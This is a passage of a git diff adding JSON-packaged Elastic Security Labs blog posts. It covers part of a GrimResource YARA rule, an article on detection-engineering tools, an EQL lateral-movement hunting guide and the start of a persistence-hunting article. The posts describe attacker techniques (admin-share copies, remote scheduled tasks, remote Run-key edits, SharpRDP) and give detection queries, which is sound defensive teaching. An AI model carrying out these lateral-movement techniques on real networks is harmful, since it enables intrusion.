\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\\\\redirect[?]\"]\n```\n\n\n\nAlongside the provided behavior rules, the following YARA rule can be used to detect similar files:\n\n```\nrule Windows_GrimResource_MMC {\n meta:\n author = \"Elastic Security\"\n reference = \"https://www.elastic.co/security-labs/GrimResource\"\n reference_sample = \"14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb\"\n arch_context = \"x86\"\n scan_context = \"file, memory\"\n license = \"Elastic License v2\"\n os = \"windows\"\n strings:\n $xml = \"). The playground takes advantage of the native Security [Timeline](https://www.elastic.co/guide/en/security/current/timelines-ui.html) correlation capabilities, and provides notes to enable learning EQL. The playground is a publicly available Elastic Security instance, pre-populated with suspicious events generated from a Sofacy group [payload](https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/). The only thing you need to access the site is a browser!\n\n\n\nEssentially, you’re presented with a dataset representative of threat activity, similar to what we rely on to build our detection rules and endpoint artifacts. This event data can then be leveraged to generate your own detection logic. It also provides a small introduction to the Elastic Security Stack, and gives you an opportunity to play with some of the cool features available (e.g. Analyzer). The visual event [Analyzer](https://www.elastic.co/guide/en/security/current/visual-event-analyzer.html) shows a graphical representation of a process tree, containing alerts and suspicious events detected by our Elastic Security Endpoint, and illustrates process lineage that can be used within a query.\n\n\n\nWe can use this information to understand how the adversary behavior works, and develop a query capable of identifying future malicious activity. For example, should Outlook spawn an explorer.exe child process? Explore the EQLPlayground, EQL [syntax](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html), and [APIs](https://www.elastic.co/guide/en/elasticsearch/reference/8.3/eql-apis.html). In the correlation view [introduced](https://www.elastic.co/blog/whats-new-elastic-security-7-12-0-analyst-driven-correlation-ransomware-prevention) with Elastic Security 7.12, you’ll have the opportunity to insert EQL and develop a query with your special sauce to detect the malicious behavior we’ve executed. You’ll also be able to look at each available field, and the data stream required to capture these events within your Stack.\n\n\n\nAs you can see, there is an example placeholder query, but you have full access to modify the query based on the full event captured and come up with the best detection. Is there something suspicious about the process tree? What about the sequence of events? Is there something fishy about rundll32.exe (a commonly used [execution proxy](https://attack.mitre.org/techniques/T1218/011/)) making external network calls?\n\n```\nsequence by process.entity_id with maxspan=10s\n[process where process.name : \"rundll32.exe\" and event.type == \"start\"]\n[network where process.name : \"rundll32.exe\" and not cidrmatch(destination.ip, \"10.0.0.0/8\", \"172.16.0.0/12\", \"192.168.0.0/16\", \"127.0.0.0/8\")]\n```\n\nWe’d love to see what cool and clever queries you’ve come up with, and if you have ideas for new rules, check out our [CONTRIBUTING.md](https://github.com/elastic/detection-rules/blob/main/CONTRIBUTING.md) guide and submit a [new rule](https://github.com/elastic/detection-rules/issues/new?assignees=&labels=Rule%3A+New&template=new_rule.md&title=%5BNew+Rule%5D+Name+of+rule). For now, we’ll use this query in creating a rule with the detection-rule CLI.\n\n# Red Team Automation (RTA)\n\nOne of the ways we automate testing Elastic’s ruleset is by launching RTA scripts that simulate threat behaviors. If you are unfamiliar with RTA, it is an open-source tool used by TRaDE to generate suspicious activity and unit test rules across multiple Stack releases. We encourage you to check out the [2018 post](https://www.elastic.co/blog/introducing-endgame-red-team-automation) by [Devon Kerr,](https://www.linkedin.com/in/devonkerr/) which introduced the capability.\n\nSometimes folks ask our team for sample data, methods to generate suspicious events to baseline configurations, or a testing environment with many alerts already generated in the Elastic Stack. We also regression test rules to validate new features added to the SIEM or Endpoint agent, any modifications based on rule tuning, or for maintenance. This process can become time-consuming with hundreds of rules to test across multiple Stack versions.\n\nIn the latest 8.4 dev cycle, we spent some time generating new macOS, Linux, and Windows RTAs. Consistent with the openness theme, we migrated our endpoint behavior tests to the Detection Rules [repo](https://github.com/elastic/detection-rules/tree/main/rta) for the community! Current RTA development is focused on endpoint behavior, and we continue to expand the coverage of our rulesets with new RTAs, so look forward to even more RTAs in the not-too-distant future.\n\n\n\nOnce you’ve cloned the detection-rules repo, you’ll be able to list all available tests. Each RTA includes helpful metadata like the platform the RTA supports, the triggered rules that will alert, and the python code that generates suspicious activity on the target system. The [common](https://github.com/elastic/detection-rules/blob/main/rta/common.py) import is packed with useful functions to simplify creating new RTAs. For example, it provides helper functionality to temporarily edit the Windows registry, check the required operating system is running the RTA, or even execute terminal commands. Essentially, it abstracts a lot of the common activity needed across the RTA set in order to simplify the development of new RTAs, especially for those less familiar with python. The RTA library was designed to use only stdlib Python packages so that no external dependencies would be required. Using only core libraries is greatly beneficial when testing in segmented environments.\n\n\n\nIn the above example, the RTA generates activity to trigger the [Suspicious Emond Child Process](https://github.com/elastic/detection-rules/blob/main/rules/macos/persistence_emond_rules_process_execution.toml) SIEM and [Potential Persistence via Emond](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_potential_persistence_via_emond.toml) endpoint behavior rules. The RTA creates a bash shell process spawned from a parent process called emond. We aim to make repeatable yet non-destructive test cases to reuse testing infrastructure as much as possible between unit tests. There are many approaches to generating suspicious events that would trigger these rules, so if you’d like to contribute your creative ideas, feel free to submit a pull request to the [detection-rules](https://github.com/elastic/detection-rules)!\n\n# Detection Rules CLI\n\nThe detection-rules CLI is a development tool swiss-army-knife that we use to manage and test whether our rules pass validation, but there are useful commands that you can use to speed up rule testing in your own environment. If you’re familiar with Python3, getting started with the Detection Rules CLI commands will only take a few steps. It has useful commands like `view-rule` , which shows the rule as a JSON object in the format expected by Kibana. Conveniently, the command also validates while loading; if you ever want to test that your TOML file matches our schema quickly, you can use this command.\n\n\n\nAfter you have installed the package [dependencies](https://github.com/elastic/detection-rules#getting-started) and your credential configuration, you’re ready to use the CLI. One of the cool things about using the CLI is the ability to download data while testing an RTA using the `collect-events` command.\n\n\n\nOnce you start collecting events, the CLI command will idle until you're ready to save events. While you wait, you have an opportunity to jump onto the target machine, execute an RTA, detonate a malware sample, or launch any payloads to trigger an alert. These events can be stored offline and reused later in an automated testing process. With the collect-events command, you can apply several options that scope your exports, like specifying the index and specific [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) of the target system you want. Once the command starts, it gathers all events associated with the host until you’re ready to stop the collection.\n\n\n\nAs you can see, it’s possible to run the `collect-events` command, generate malicious activity on a target system (e.g., using an RTA), and download the events locally for review. Some users export and use these events as-is, but we intend to store these events to help automate and streamline our end-to-end testing process.\n\nApart from the `es` (Elasticsearch) function, we often use several other options like linting our ruleset with `toml-lint` , validating our rules with `validate-all` , or even surveying out ruleset against alerts with in-development commands buried deep within our dev CLI section like `rule-survey`. If you’re interested in reading more about the other fields available, see our guide on [creating a rule with the CLI](https://github.com/elastic/detection-rules/blob/main/CONTRIBUTING.md#creating-a-rule-with-the-cli) or the [CLI.md](https://github.com/elastic/detection-rules/blob/main/CLI.md). As always, if you have any questions or need help, feel free to submit an issue.\n\nTools like the EQLPlaygound, RTAs, and detection-rules CLI are great resources for getting started with EQL, threat hunting, and detection engineering respectively. Coupled with the detection-rules CLI and RTAs, these tools give security research engineers immediate feedback to begin managing their custom Elastic detection rules. Whether you’re using a cloud Elastic Stack, a local deployment, or are setting up a lab environment with our newly released [Elastic Container Project](https://www.elastic.co/security-labs/the-elastic-container-project), we’ve got you covered. These are just a few tools we use that you're welcome to try out for your internal workflows, they help us test and create rules every day.\n\nIn a following article of TRaDE craft, we’ll describe how we validate our rules across languages like EQL or KQL, and how we automate our end-to-end process. Additionally, if you’re interested in hearing how our partners at Tines have integrated Elastic detection logic, check out their blog on [Automating Detection-as-Code](https://www.tines.com/blog/automating-detection-as-code), which walks through the Elastic SIEM, detection content development CI/CD, alert management, and response handling.\n\nWe’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/protections-artifacts/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!\n"
+ },
+ "title": "Handy Elastic Tools for the Enthusiastic Detection Engineer",
+ "slug": "handy-elastic-tools-for-the-enthusiastic-detection-engineer",
+ "date": "2022-09-12",
+ "description": "Tools like the EQLPlaygound, RTAs, and detection-rules CLI are great resources for getting started with EQL, threat hunting, and detection engineering respectively.",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ }
+ ],
+ "image": "security-threat-monitoring-compliance-1200x628.jpg",
+ "category": null,
+ "tags": [
+ "python",
+ "eql",
+ "rta",
+ "detection-rules",
+ "eqlplayground"
+ ]
+ },
+ "id": "security_labs_content-handy_elastic_tools_for_the_enthusiastic_detection_engineer-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_lateral_movement_using_event_query_language-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_lateral_movement_using_event_query_language-md.json
new file mode 100644
index 00000000000..228d2b1cd61
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_lateral_movement_using_event_query_language-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Hunting for Lateral Movement using Event Query Language\"\nslug: \"hunting-for-lateral-movement-using-event-query-language\"\ndate: \"2023-03-01\"\ndescription: \"Elastic Event Query Language (EQL) correlation capabilities enable practitioners to capture complex behavior for adversary Lateral Movement techniques. Learn how to detect a variety of such techniques in this blog post.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"blog-thumb-security-honeycomb.jpg\"\ncategory:\n - slug: security-operations\n - slug: detection-science\n---\n\n[Lateral Movement](https://attack.mitre.org/tactics/TA0008/) describes techniques that adversaries use to pivot through multiple systems and accounts to improve access to an environment and subsequently get closer to their objective. Adversaries might install their own remote access tools to accomplish Lateral Movement, or use stolen credentials with native network and operating system tools that may be stealthier in blending in with normal systems administration activity.\n\nDetecting Lateral Movement behaviors often involves the design of detections at both the source and the target system, as well as the correlation of more than one type of event (such as network events with process execution events) in order to capture the remote execution context.\n\nIn this blog, we explore some examples of techniques and leverage the capabilities of Elastic’s [Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) to design behavioral hunts and detections.\n\n## **How Lateral Movement works**\n\nLateral Movement is usually composed of the following high-level steps:\n\n1. Remote authentication to the target host (valid access credentials are required)\n2. Staging the command to execute to the remote host or to another resource accessible by the target host such as internet URL or a Network File Share\n3. Remotely triggering the execution (immediate or scheduled) of the staged program on the target host via accessible remote services and protocols ([Service](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f), [Task Scheduler](https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page), [WinRM](https://docs.microsoft.com/en-us/windows/win32/winrm/portal), [WMI](https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page), [Remote Registry](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78)).\n4. Clean up the staged payload and any other relevant artifacts to avoid suspicion (optional)\n\nNote that staging a program (step 2) is not always necessary, as there are usually exposed services that allow for remote interaction with the target host such as [PowerShell Remoting](https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1) and [Remote Desktop (RDP)](https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/clients/remote-desktop-clients).\n\n## **Lateral Tool Transfer**\n\nFiles may be copied from one system to another to stage adversary tools or other files over the course of an operation. A commonly abused vector is [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1570/) via the use of built-in system commands such as copy, move copy-item, and others:\n\n\n\n_Figure 1: File copy via system command_\n\nFrom the source machine, there are alternative methods of copying the file without having to execute suspicious commands. Still, it’s important to look for low-hanging detection opportunities.\n\nFigure 2 below shows an EQL query that looks for the following behavior that is consistent with an attacker transferring a file to a remote host:\n\n- Execution of a command interpreter with a [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) keyword array related to file copy (copy, move) and a hidden file share (prefixed by a $ sign such as c$ admin$)\n- Staging data from a shadow copy volume (often associated with credential access via staging of [NTDS.dit](https://attack.mitre.org/techniques/T1003/003/) or [Registry SAM](https://attack.mitre.org/techniques/T1003/002/) key to access stored account password hashes)\n\n\n\n_Figure 2: Hunting EQL for file transfer via hidden file share from source machine_\n\nOn the target machine, we’ve observed that all files copied via server message block (SMB) are represented by a file creation event by the virtual process System (always has a static [process.pid](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-pid) value equal to 4 and represents the Windows kernel code and loaded kernel mode drivers):\n\n\n\n_Figure 3: File creation event details depicted in Kibana’s Discover view as a result of file transfer over SMB_\n\nA file creation event alone is not enough (the System process may create files that are related to local activity) to conclude that this activity pertains to a Lateral Movement attempt. Thus, we need to correlate it with _incoming_ SMB network events by the same process:\n\n\n\n_Figure 4: Hunting EQL for file transfer via hidden file share from target host_\n\nThe above query looks for an incoming remote network event to tcp port 445 (SMB) followed by immediate file creation or modification (can be limited to executable file extension to reduce false positives) and both events are performed by the same ([process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id)) virtual System process.\n\n\n\n_Figure 5: Detection alert example for Lateral Tool Transfer from target host_\n\nThe above alert contains details about the file that was copied as well as the [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) address of the Lateral Movement activity. The same logic triggers on [PSExec](https://www.ired.team/offensive-security/lateral-movement/lateral-movement-with-psexec), a remote execution utility often abused by adversaries for the same purpose:\n\n\n\n_Figure 6: Lateral Tool Transfer triggering on PSEXEC from target host_\n\nWe can also leverage [EQL correlation](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to capture instances where a file that was copied via SMB is immediately executed:\n\n\n\n_Figure 7: Hunting EQL for remote execution via file shares_\n\nThe above EQL looks for a [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) of events where a file is created/modified by the virtual System process followed by a process event where the [process.executable](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-executable) is equal to the [file.path](https://www.elastic.co/guide/en/ecs/current/ecs-file.html#field-file-path). Below is an alert example:\n\n\n\n_Figure 8: Detection alert for remote execution via file shares from target host_\n\nAnother example where file transfer over SMB can be abused for remote execution is copying a malicious executable, script, or shortcut to the [Startup folder](https://attack.mitre.org/techniques/T1547/001/) of a target host. This will cause the program referenced to be automatically executed when a user logs in, and in the context of that user:\n\n\n\n_Figure 9: Hunting EQL for Lateral Movement via startup folder_\n\nBelow is an example of a detection alert for Lateral Movement via the [Startup folder](https://attack.mitre.org/techniques/T1547/001/):\n\n\n\n_Figure 10: Detection alert for Lateral Movement via startup folder_\n\n## **Remotely Scheduled Tasks**\n\nAdversaries may leverage scheduled tasks for remote execution — either via built-in system utilities such as schtasks.exe or directly via the [Task Scheduler API](https://docs.microsoft.com/en-us/windows/win32/api/_taskschd/), which may be stealthier because visibility is limited.\n\nBelow is an example of remote task creation via the [MoveScheduler](https://github.com/mez-0/MoveScheduler) penetration testing tool:\n\n\n\nFigure 11: Lateral Movement via MoveScheduler\n\nBoth schtasks.exe and direct usage of a custom implementation will cause a process to load the Task Scheduler COM API (taskschd.dll), followed by an outbound network connection where both the [source.port](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) and the [destination.port](https://www.elastic.co/guide/en/ecs/current/ecs-destination.html#field-destination-port) are equal or greater than RPC dynamic ports (49152 to 65535) and from the same [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id), which can be translated to this [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) query:\n\n\n\n_Figure 12: Hunting EQL query for outbound task scheduler activity on source host_\n\nOf course, matches to this query can be related to scheduled tasks discovery as well. Below is an example of an alert where we can observe the username, source, and destination IP, as well as the process name used to perform a remote task activity:\n\n\n\n_Figure 13: Detection alert for Lateral Movement via Scheduled Task on source host_\n\nOn the _target_ host, we can hunt for remote scheduled task creation/modification via two options:\n\n1. Incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network event by the Task Scheduler service (svchost.exe) followed by a file creation of a task XML configuration file (C:\\\\Windows\\\\System32\\\\Tasks\\\\task_filename)\n2. Incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network event by the Task Scheduler service (svchost.exe) followed by a registry change of a task cache Action value (HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\\\{GUID\\}\\\\Actions)\n\nOption A provides us with the task name (equal to the [file.name](https://www.elastic.co/guide/en/ecs/current/ecs-file.html#field-file-name) of the changed/created file), and Option B provides us with the task action itself (equal to the base64 decoded data of the Action registry value where the task scheduler service caches the task action configuration):\n\n\n\n_Figure 14: Hunting EQL query for task creation on target host (Option A)_\n\n\n\n_Figure 15: Hunting EQL query for task creation on target host (Option B)_\n\nOption B has the advantage of providing details about the task action, which tend to be useful while triaging (set to execute a program from a [suspicious path](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_from_unusual_path_cmdline.toml), [LOLBAS](https://lolbas-project.github.io/) process, etc.).\n\n\n\n_Figure 16: Detection alert for Lateral Movement via Scheduled Task on target host_\n\nDecoding the registry Action base64 encoded data provides us details about the created task action:\n\n\n\n_Figure 17: Base64 decoded data of the scheduled task action registry value_\n\n## **Remote Registry**\n\nAdversaries may leverage the Remote Registry service for defense evasion or remote execution. One simple scenario is to modify the Run key registry on a remote system to cause the execution of a program upon system startup or user logon:\n\n\n\n_Figure 18: Remote modification of the Run registry key via reg utility_\n\nWe can hunt for this behavior from the source machine by looking for the execution of reg.exe with process.args containing \\\\\\*, but the same action can be achieved via API calls avoiding [process .command_line](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-command-line)-based detections.\n\n\n\n_Figure 19: Example of Reg.exe process execution event on source host_\n\nNote that Reg.exe is not performing any network connection — instead, it’s the virtual System process that issues an outbound network connection to the target host on port 445 ([DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) over SMB).\n\nOn the target host we can see the following sequence of key events:\n\n1. Incoming network connection on tcp port 445 ([DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) over SMB) by the virtual System process ([process.pid](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-pid) equal 4)\n2. RemoteRegistry service process starts (svchost.exe with [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) containing the string RemoteRegistry)\n3. RemoteRegistry service process performs the registry change\n\n\n\n_Figure 20: Remote Registry-relevant events on target host_\n\nThe following [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) hunt can be used to correlate (2) and (3) by [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) and [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id) of the Remote Registry service:\n\n\n\n_Figure 21: Hunting EQL to detect Remote Registry modification via Regsvc on target host_\n\nIf we include (1) in the above [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to capture the [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) address, it may trigger on unrelated incoming SMB connections as the only common element between the three events limited to the [host.id](https://www.elastic.co/guide/en/ecs/current/ecs-host.html#field-host-id) value.\n\n\n\n_Figure 22: Detection alert for Remote Registry modification via Regsvc on target host_\n\nAdversaries may attempt to achieve the same outcome via the Windows Management Instrumentation (WMI) registry provider ([StdReg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov)), which behaves differently:\n\n1. WMI Service (svchost.exe with [process.args](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-args) containing Winmgmt string) accepts an incoming [DCE/RPC](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15) (over TCP/IP) network connection where both [source.port](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip) and the [destination.port](https://www.elastic.co/guide/en/ecs/current/ecs-destination.html#field-destination-port) are greater than or equal to RPC dynamic ports ( 49152 to 65535)\n2. A new instance of the WMI Provider Host (process.name equal to WmiPrvSe.exe with [user.name](https://www.elastic.co/guide/en/ecs/current/ecs-user.html#field-user-name) equal to Local Service or [user.id](https://www.elastic.co/guide/en/ecs/current/ecs-user.html#field-user-id) equal to S-1-5-19) is started\n3. The started WMI Provider Host loads the registry provider StdProv.dll module\n4. The WMI Provider Host performs the registry change\n\nWe can express the correlation of (1), (2) and (4) with the following hunting [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html):\n\n\n\n_Figure 23: Hunting EQL for Remote Registry modification via Regsvc on target host_\n\nIf logging of the StdProv.dll module loading is enabled, we can also add (3) to the [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) to reduce potential false positives:\n\n\n\n_Figure 24: Hunting EQL for Remote Registry modification via Regsvc on target host (library event)_\n\nBelow an example of a detection alert where we can see the remotely modified registry details and the remote [source.ip](https://www.elastic.co/guide/en/ecs/current/ecs-source.html#field-source-ip):\n\n\n\n_Figure 25: Detection alert for Remote Registry modification via the WMI on target host_\n\n## **Sharp Remote Desktop**\n\n[SharpRDP](https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3) is a Lateral Movement tool that leverages the Remote Desktop Protocol (RDP) for authenticated command execution and without the need for graphical interaction.\n\nOnce authenticated, SharpRDP sends [virtual keystrokes](https://docs.microsoft.com/en-us/windows/win32/inputdev/virtual-key-codes) to the remote system via a method called [SendKeys](https://docs.microsoft.com/en-us/windows/win32/termserv/imsrdpclientnonscriptable-sendkeys) to open up a [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) on the target host and then enter a specified command, which will be executed on the target host.\n\nThe main indicator from the source host is an unusual process (hosting SharpRDP code) loading the Remote Desktop Services ActiveX Client that implements RDP client functionality (MsTscAx.dll) followed by an outbound network connection to RDP tcp port 3389 and both events from the same [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id):\n\n\n\n_Figure 26: Hunting EQL for suspicious RDP Client_\n\nBelow an example of results matching our hunting EQL where we can see an unusual process (other than mstsc.exe and similar known RDP clients) loading the Remote Desktop Services ActiveX Client (MsTscAx.dll) as well as the outbound network connection:\n\n\n\n_Figure 27: Results example for suspicious RDP Client EQL hunt_\n\nOn the target host, the following key events occur within a one-minute time window:\n\n1. An incoming network connection is accepted by the RDP service (TermService svchost.exe) on port 3389\n2. Under the [RunMRU](https://resources.infosecinstitute.com/topics/digital-forensics/understanding-critical-windows-artifacts-and-their-relevance-during-investigation-part-2/) registry key, a new (or update to an existing) string value is set to cmd, powershell, taskmgr or tsclient (depending on the chosen SharpRDP [execution method](https://github.com/0xthirteen/SharpRDP)), which is caused by the typed command in the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) via the [SendKeys](https://docs.microsoft.com/en-us/windows/win32/termserv/imsrdpclientnonscriptable-sendkeys) method\n3. Depending on the execution [method](https://github.com/0xthirteen/SharpRDP), a new process (attacker command) is created with [process.parent.name](https://www.elastic.co/guide/en/ecs/current/ecs-process.html) of cmd.exe, powershell.exe, taskmgr.exe, or a random executable running from the [tsclient](https://www.virtualizationhowto.com/2016/07/map-network-drive-remote-desktop-local-computer/) mountpoint (shared drive from the RDP client host with the RDP target server)\n\nFor (2), note that when running anything from the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/), a registry entry will be created at HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU showing what was entered into the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) box.\n\nThe above [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) of events can be expressed with the following [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html):\n\n\n\n_Figure 28: Hunting EQL for SharpRDP behavior on the target host_\n\nExample of a detection alert and its composing event details on the target host:\n\n\n\n_Figure 29: Detection alert for SharpRDP on target host (TermService network connection)_\n\n\n\n_Figure 30: Detection alert for SharpRDP on target host (RunMRU set to Powershell)_\n\n\n\n_Figure 31: Detection alert for SharpRDP on target host (PowerShell child process)_\n\n## **Wrapping up**\n\n[Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) correlation capabilities enable us to capture complex behavior for a variety of Lateral Movement techniques. The high-level steps are:\n\n1. **Understand the theory** and the building blocks of a certain technique (network protocols, loaded modules, services, process names, and arguments)\n2. **Identify the key events** and their order that compose a certain behavior (both source and target host)\n3. **Identify the common values** that can be used for correlation ([sequences](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences)) — identifying more commonalities can reduce false positives\n4. **Identify enrichment possibilities** , such as extra events in the sequence that can be useful during alert triage\n5. **Assess the window of time** for correlation — using a shorter time window (for example, 30 seconds instead of 1 second) can reduce false positives, but can also introduce false negatives caused by network latency or slow system\n6. **Test using different methods and tools** and tune the hunting logic accordingly, or, in some instances, duplicate logic to capture edge cases\n\nSome of the [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) detection rules used as examples can be found in the [Elastic detection-rules](https://github.com/elastic/detection-rules)repository:\n\n- [Remote File Copy to a Hidden Share](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml)\n- [Lateral Tool Transfer](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_executable_tool_transfer_smb.toml)\n- [Remote Execution via File Shares](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml)\n- [Lateral Movement via Startup Folder](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml)\n- [Outbound Scheduled Task Activity via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_scheduled_task_powershell_source.toml)\n- [Remote Scheduled Task Creation](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_scheduled_task_target.toml)\n- [Potential SharpRDP Behavior](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_rdp_sharprdp_target.toml)\n- [Suspicious RDP ActiveX Client Loaded](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml)\n- [Execution via TSClient Mountpoint](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_execution_from_tsclient_mup.toml)\n\nIf you’re new to [Elastic Security](https://www.elastic.co/security), you can experience our latest version on [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud.\n"
+ },
+ "title": "Hunting for Lateral Movement using Event Query Language",
+ "slug": "hunting-for-lateral-movement-using-event-query-language",
+ "date": "2023-03-01",
+ "description": "Elastic Event Query Language (EQL) correlation capabilities enable practitioners to capture complex behavior for adversary Lateral Movement techniques. Learn how to detect a variety of such techniques in this blog post.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "blog-thumb-security-honeycomb.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_for_lateral_movement_using_event_query_language-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_1-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_1-md.json
new file mode 100644
index 00000000000..1175140a1d9
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_1-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)\"\nslug: \"hunting-for-persistence-using-elastic-security-part-1\"\ndate: \"2022-06-01\"\ndescription: \"Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.\"\nauthor:\n - slug: david-french\n - slug: brent-murphy\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-security-breach-red-lock.jpg\"\ncategory:\n - slug: adversary\n---\n\nLast month, we hosted a webinar, [Hunting for persistence using Elastic Security](https://www.elastic.co/webinars/hunting-for-persistence-using-elastic-security), where we examined some techniques that attackers use in the wild to maintain presence in their victim’s environment. For each technique covered, we explained:\n\n- How the offensive technique works\n- Why the technique is often successful for attackers\n- How defenders can hunt for and detect the malicious behavior effectively using [Elastic Security](https://www.elastic.co/security)\n\nIn this two-part blog series, we’ll share the details of what was covered during our webinar with the goal of helping security practitioners improve their visibility of these offensive persistence techniques and help to undermine the efficacy of these attacks against their organization.\n\nPart 1 will explain what persistence is and why attackers need it. We’ll introduce the Event Query Language (EQL) before showing its practical use cases for threat hunting. We will examine a popular technique used by adversaries to maintain persistence, Windows Management Instrumentation (WMI) Event Subscription ([T1084](https://attack.mitre.org/techniques/T1084/)). We’ll also share how Elastic Security users can hunt for and detect this technique being used in their environment.\n\nIn part 2, we’ll explore two additional persistence techniques that are being used by attackers in the wild: BITS 